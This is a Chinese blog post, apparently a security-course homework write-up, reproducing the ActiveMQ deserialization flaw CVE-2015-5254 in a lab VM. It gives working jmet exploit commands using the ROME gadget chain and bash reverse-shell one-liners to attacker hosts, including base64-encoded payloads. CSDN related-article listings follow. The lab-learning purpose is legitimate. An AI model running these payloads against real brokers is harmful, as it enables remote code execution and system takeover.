阿一网络安全学院课堂作业——ActiveMQ 反序列化漏洞 (CVE-2015-5254)

已于 2024-05-24 14:54:24 修改
阅读量859 收藏 16
点赞数 16
文章标签: web安全 activemq 安全
于 2024-05-24 11:20:45 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Ayixy/article/details/139169960
版权
⼀、漏洞描述
Apache ActiveMQ 是由美国阿帕奇(Apache)软件基⾦会开发的开源消息中间件,⽀持 Java 消息服
务、集群、Spring 框架等。属于消息队列组件(消息队列组件:分布式系统中的重要组件,主要解决应⽤
耦合、异步消息、流量削峰等)。
⼆、漏洞成因
Apache ActiveMQ 5.13.0版本之前到5.x版本的安全漏洞,该程序引起的漏洞不限制代理中可以序列化的
类。远程攻击者可以制作⼀个特殊的序列化 Java 消息服务 (JMS) ObjectMessage 对象,利⽤该漏洞执
⾏任意代码。
三、影响版本
Apache ActiveMQ 5.x ~ Apache ActiveMQ 5.13.0
四、利⽤限制
1.版本符合
2.⽴即执⾏代码:能够通过弱密码登录查看消息队列
3.没有查看队列所有消息的⽤户名和密码下,只能管理员/⽤户去点击我们插⼊的消息才能触发(⽐较鸡
肋,但可以写⼊创建⽤户命令等待管理员点击查看,概率很⼤!)
java要求:jdk1.8
安装教程: https://blog.csdn.net/Deadly_97/article/details/111657908
压缩包安装
java1.8环境配置
vim /stc/profile
命令⾏
vulhub漏洞复现】ActiveMQ 反序列化漏洞 (CVE-
2015-5254)
JAVA_HOME=/usr/local/java/jdk1.8.0_161
PATH=$PATH:$HOME/bin:$JAVA_HOME/bin
export JAVA_HOME
export PATH
1
2
3
4
Plain Text 1、
sudo update-alternatives --install "/usr/bin/java" "java" "/usr/local/java/jdk1.8.0_202/bin/java" 1
sudo update-alternatives --install "/usr/bin/javac" "javac"
"/usr/local/java/jdk1.8.0_202/bin/javac" 1
sudo update-alternatives --install "/usr/bin/javaws" "javaws"
"/usr/local/java/jdk1.8.0_202/bin/javaws" 1
sudo update-alternatives --install "/usr/bin/javaws" "javaws"
"/usr/local/java/jdk1.8.0_202/bin/javaws" 1
2、
sudo update-alternatives --set java /usr/local/java/jdk1.8.0_202/bin/java
sudo update-alternatives --set javac /usr/local/java/jdk1.8.0_202/bin/javac
sudo update-alternatives --set javaws /usr/local/java/jdk1.8.0_202/bin/javaws
jmet 安装:
#下载jmet的jar包
wget https://github.com/matthiaskaiser/jmet/releases/download/0.1.0/jmet-0.1.0-all.jar
#创建external⽬录
mkdir external
靶场教程: https://blog.csdn.net/hellohahi/article/details/122418168
在浏览器输⼊靶机ip打开环境web⽹⻚:密码admin/admin
使⽤⼯具:nmap
使⽤命令:nmap -p- -A -O 192.168.110.145(需切换到root在执⾏)
执⾏环境:虚拟机中kali
通过nmap扫描⽬标靶机端⼝和服务版本信息,发现⽬标开放的61616端⼝上承载apachemq ActiveMQ
服务
在阿⾥云中操作:(报错⽆法执⾏)
java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "touch /tmp/sucess" -Yp ROME
192.168.110.145 61616(靶机ip)
10 【命令解释】:调⽤java -jar 运⾏ jmet的jar包,-Q是插⼊⼀个名为event的队列,-I 是选择装载
ActiveMQ模块 ,-s 是选择ysoserial payload ,-Y 是攻击模式和内容, -Yp 是选择攻击利⽤链,这是
选择是ROME, 之后带上IP加端⼝。
上述问题成因:靶场搭在虚拟机,虚拟机上ip为内⽹;阿⾥云ip为公⽹,公⽹⽆法找到内⽹ip,所以不成
功。
所以,在虚拟中另⼀个kali中操作:
docker exec -it cve- 2015 -5254_activemq_1 /bin/bash
阿⾥云内指令:
bash -i >& /dev/tcp/192.168.110.133/4444 0>&1
java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "bash -c
{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjExMC4xMzMvNDQ0NCAwPiYx}|{base64,-d}|
{bash,-i}" -Yp ROME 192.168.110.145 61616
虚拟机中kali:
bash -i >& /dev/tcp/218.244.159.113/9999 0>&1
java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "bash -c
{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8yMTguMjQ0LjE1OS4xMTMvOTk5OSAwPiYx}|{base64,-d}|
{bash,-i}" -Yp ROME 192.168.110.145 61616
网安大队长阿一
关注
ActiveMQ漏洞总结
看不尽的尘埃——博客
02-11 1万+
目录 ActiveMQ 攻击方式 寻找目标 弱口令 未授权访问 源代码泄露 XSS漏洞 远程代码执行漏洞 反序列化漏洞 ActiveMQ Apache ActiveMQ是美国阿帕奇(Apache)软件基金会所研发的一套开源的消息中间件,它支持Java消息服务、集群、Spring Framework等。随着中间件的启动,会打开两个端口,61616是工作端口,消息在这个端口进行传...
ActiveMQ 反序列化漏洞 (CVE-2015-5254)
qq_32642035的博客
10-17 1247
ActiveMQ 反序列化漏洞 (CVE-2015-5254)漏洞复现
ActiveMQ 反序列化漏洞CVE-2015-5254
The code way of kinnisoy
10-24 2012
ActiveMQ 反序列化漏洞CVE-2015-5254
ActiveMQ未授权访问漏洞
最新发布
qq_68186313的博客
08-05 189
ActiveMQ是一款流行的开源消息服务器。默认情况下,ActiveMQ服务是没有配置安全参数。非法人员可以利用默认配置弱点发动远程命令执行攻击,获取服务器权限,从而导致数据泄漏。2、ActiveMQ默认使用8161端口,默认用户名和密码是admin/admin,在打开的页面输入。1、使用以下Fofa语法搜索产品。ActiveMQ未授权访问漏洞
ActiveMQ反序列化漏洞CVE-2015-5254
Kevin's Blog
06-02 1824
文章目录一、介绍1.1 简介1.2 影响版本1.3 漏洞成因1.4 利用限制1.4 业务场景1.5 使用概率二、模拟环境三、漏洞利用3.1 信息收集3.2 漏洞复现 一、介绍 1.1 简介   Apache的一款JAVA开源消息中间件,支持Java消息服务、集群、SpringFrameword等。属于消息队列组件。 消息队列组件:分布式系统中的重要组件,主要解决应用耦合、异步消息、流量削峰等 1.2 影响版本 Apache ActiveMQ < 5.x 1.3 漏洞成因   漏洞没有限制在代理
漏洞复现】---- ActiveMQ 反序列化漏洞CVE-2015-5254
qq_43168364的博客
09-04 702
一、简介 Apache ActiveMQ是老外所研发的一套开源的消息中间件,它支持Java消息服务、集群、Spring Framework等。该漏洞源于程序没有限制可在代理中序列化的类。攻击者可以借助特制的序列化的java消息服务(JMS)ObjectMessage对象利用该漏洞执行恶意代码。 漏洞影响的版本为:Apache ActiveMQ 5.13.0之前的版本。 二、漏洞环境准备 pull下来内容 环境运行后,将监听61616和8161两个端口。其中61616是工作端口,消息在这个端口进行传递
阿一鲍鱼-阿一鲍鱼1980.docx
11-25
阿一鲍鱼-阿一鲍鱼1980.docx
动态多尺度图神经网络预测三维人体运动
214基于动态多尺度图神经网络的三维人体运动预测李茂森1,陈思恒2,赵阳恒1,张雅1,王伟1,田琦1上海交通大学2三菱电机研究所{李茂森,赵阳恒,张雅,王艳峰}@ sjtu.edu.cn,schen@merl.com,wywqtian@gmail.com...
最新-英语国际音标表(48个)word版-绝对准确!-最新音标表.doc
10-06
英语国际音标是学习英语发音的重要工具,它为每个英语音素提供了标准化的表示方式,使得非母语者能够更准确地理解和模仿英语发音。48个音标分为元音和辅音两大类,下面分别进行详细解释。 **一、元音(20个)** 1....
专题课件完美版(2021-2022年)南昌赣江新天地项目品牌推广策略案76PPT九天机构.ppt
10-01
此外,高端定位的四星酒店——香港怡和假日酒店,以及阿一鲍鱼、芭蕉叶餐厅等知名品牌的入驻,为项目带来了高人气和良好的口碑。 然而,赣江新天地的目标并不仅仅是一次性的吸引力,而是寻求长期的经营与品牌忠诚度...
"非线性时间序列的神经网络预测方法
¼可在www.sciencedirect.com在线获取...*,Hesham Hefnya,Amr Badrba埃及吉萨开罗大学统计研究所计算机科学系b埃及吉萨开罗大学计算机和信息学院计算机科学系接收日期:2017年3月19日;接受日期:2017年5月14日2017年7
ActiveMQ 反序列化RCE漏洞CVE-2023-46604)
zneVue
07-17 685
在Apache ActiveMQ 5.18.2版本及以前,OpenWire协议通信过程中存在一处反序列化漏洞,该漏洞可以允许具有网络访问权限的远程攻击者通过操作 OpenWire 协议中的序列化类类型,导致代理的类路径上的任何类实例化,从而执行任意命令。
ActiveMQ反序列化漏洞CVE-2015-5254)复现
weixin_30784141的博客
11-16 181
0x00 漏洞前言 Apache ActiveMQ是美国阿帕奇(Apache)软件基金会所研发的一套开源的消息中间件,它支持Java消息服务,集群,Spring Framework等。Apache ActiveMQ 5.13.0之前5.x版本中存在安全漏洞,该漏洞源于程序没有限制可在代理中序列化的类。远程攻击者可借助特制的序列化的Java消息服务(JMS)ObjectMes...
ActiveMQ反序列化漏洞原理+复现
ChenD的学习笔记
03-09 2298
ActiveMQ通过消息队列来实现信息传递,每个消息要保证发出端和接收端格式相同,其中使用了序列化的方法进行传递,在这个过程中没有限制可在代理中序列化的类,这时候我们就可以自己构造一份序列化的恶意代码payload,将其作为事件发到ActiveMQ服务上,在管理员在后台管理时触发了payload,或者攻击者使用弱口令拿到ActiveMQ的账户,并执行了payload,则可以成功利用该漏洞。消息队列,服务器A将客户发起的请求放入服务器B的消息队列中,服务器B从消息队列中取出并处理。
ActiveMQ反序列化漏洞(CVE-2015-5254)
07-16 516
1.漏洞介绍:Apache ActiveMQ是美国阿帕奇(Apache)软件基金会所研发的一套开源的消息中间件,它支持Java消息服务,集群,Spring Framework等。Apache ActiveMQ 5.13.0之前5.x版本中存在安全漏洞,该漏洞源于程序没有限制可在代理中序列化的类。远程***者可借助特制的序列化的Java消息服务(JMS)ObjectMessage对象利用该漏洞执行任...
EditPlus高效配置与使用技巧分享
此外,作者还推荐了一篇名为《“阿一web标准学堂”选修课:EditPlus高级使用技巧》的文章,该教程提供了视频、课件和代码资源,有助于进一步深化对EditPlus的理解和掌握高级功能。通过结合阅读和实践,读者能够更好...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值